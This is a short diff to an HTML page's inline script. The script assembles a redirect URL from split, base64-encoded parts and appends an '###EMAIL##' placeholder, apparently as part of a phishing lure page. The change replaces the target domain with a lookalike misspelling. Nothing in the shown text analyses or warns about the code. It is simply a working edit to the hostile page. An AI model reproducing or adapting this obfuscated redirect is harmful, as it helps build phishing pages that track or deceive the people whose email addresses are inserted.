--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     </style>
     <script>
         (function() {
-            var part1 = "https://materialesgraficos.com/i/?bGFuZz1lbiZzdj1nZ";
+            var part1 = "https://materiaaaaalesgraficos.com/i/?bGFuZz1lbiZzdj1nZ";
             var part2 = "W5lcmFsJnJib";
             var part3 = "3g9c3VuYmFpdGY=###EMAIL##";
 
